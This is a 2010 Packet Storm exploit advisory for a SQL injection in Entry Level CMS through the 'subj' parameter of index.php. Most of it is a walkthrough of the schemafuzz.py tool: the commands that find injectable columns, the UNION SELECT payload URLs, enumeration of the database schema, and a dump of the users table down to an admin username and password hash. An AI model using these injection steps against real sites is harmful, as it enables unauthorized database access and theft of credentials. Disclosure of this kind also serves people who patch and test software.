Entry Level CMS SQL Injection

2010-02-23T00:00:00
ID PACKETSTORM:86559
Type packetstorm
Reporter HaMaDa SCoOoRPioN
Modified 2010-02-23T00:00:00

Description

                                        
                                            `  
  
  
[+]Title : SQL Injection Entry Level Content Management System (EL  
CMS) with schemafuzz.py  
  
--==[ Author ]==--  
[+] Author : [+] HaMaDa SCoOoRPioN (NEWBIE)  
[+] Contact : 0u@linuxmail.org  
[+] Group : The ISLAM OF DEFENDERS AND ATTACK  
[+] Site : www.islam-defenders.com  
********************************************  
  
[Software Information ]  
[+]SOftware : Entry Level Content Management System (EL CMS)  
[+]vendor : http://www.entrylevelcms.com/  
[+]Vulnerability : SQL Injection  
********************************************  
  
[ Vulnerable File ]  
http://localhost/website/index.php?subj=4  
  
[demo with schemafuzz.py]  
|---------------------------------------------------------------  
| 0u[at]linuxmail[dot]org v5.0  
| 6/2008 schemafuzz.py  
| -MySQL v5+ Information_schema Database Enumeration  
| -MySQL v4+ Data Extractor  
| -MySQL v4+ Table & Column Fuzzer  
| Usage: schemafuzz.py [options]  
| -h help darkc0de.com  
|------------------------------------------------------------  
  
C:Python26exploitschemafuzz>schemafuzz.py -u  
"http://localhost/website/index.php?subj=6" --findcol  
  
  
[+] URL:http://localhost/website/index.php?subj=6--  
[+] Evasion Used: "+" "--"  
[+] 03:36:40  
[-] Proxy Not Given  
[+] Attempting To find the number of columns...  
[+] Testing: 0,1,2,3,  
[+] Column Length is: 4  
[+] Found null column at column #: 0  
[+] SQLi URL:  
http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3--  
[+] darkc0de URL:  
http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2  
,3  
[-] Done!  
  
C:Python26exploitschemafuzz>schemafuzz.py -u  
"http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,  
2,3" --full  
  
|------------------------------------------------------------  
|  
| 6/2008 schemafuzz.py  
| -MySQL v5+ Information_schema Database Enumeration  
| -MySQL v4+ Data Extractor  
| -MySQL v4+ Table & Column Fuzzer  
| Usage: schemafuzz.py [options]  
| -h help darkc0de.com  
|------------------------------------------------------------  
  
[+]  
URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de  
,1,2,3--  
[+] Evasion Used: "+" "--"  
[+] 05:33:34  
[+] Proxy Not Given  
[+] Gathering MySQL Server Configuration...  
Database: vman  
User: root@localhost  
Version: 5.0.51a  
  
[Database]: elcms_db  
[Table: Columns]  
[0]pages: id,subject_id,menu_name,position,visible,content  
[1]subjects: id,menu_name,position,visible  
[2]users: id,username,hashed_password  
  
[-] [05:55:27]  
[-] Total URL Requests 17  
[-] Done  
  
  
C:Python26schemafuzz>schemafuzz.py -u  
"http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,  
2,3" --dump -D elcms_db -T users -C id,username,hashed_password  
  
|------------------------------------------------------------  
|  
| 6/2008 schemafuzz.py  
| -MySQL v5+ Information_schema Database Enumeration  
| -MySQL v4+ Data Extractor  
| -MySQL v4+ Table & Column Fuzzer  
| Usage: schemafuzz.py [options]  
| -h help darkc0de.com  
|------------------------------------------------------------  
  
[+]  
URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de  
,1,2,3--  
[+] Evasion Used: "+" "--"  
[+] 05:35:14  
[+] Proxy Not Given  
[+] Gathering MySQL Server Configuration...  
Database: vman  
User: root@localhost  
Version: 5.0.51a  
[+] Dumping data from database "vman" Table "users"  
[+] Column(s) ['id', 'username', 'hashed_password']  
[+] Number of Rows: 1  
  
[0]  
9:admin:376cb350808d766e547eadc45b8f19f541d436c8:376cb350808d766e547eadc45b  
8f19f541d436c8:  
  
[-] [05:35:15]  
[-] Total URL Requests 3  
[-] Done  
  
If you not understand about it  
[Option/help this tools]  
schemafuzz.py -h  
  
********************************************  
-- Thank YOU BRO  
  
HaMaDa SCoOoRPioN  
  
www.islam-defenders.com  
  
0u@linuxmail.org  
  
________________________________  
Hotmail: بريد إلكتروني موثوق فيه ويتمتع بحماية Microsoft القوية من البريد العشوائي. اشترك الآن.<https://signup.live.com/signup.aspx?id=60969>  
  
  
  
`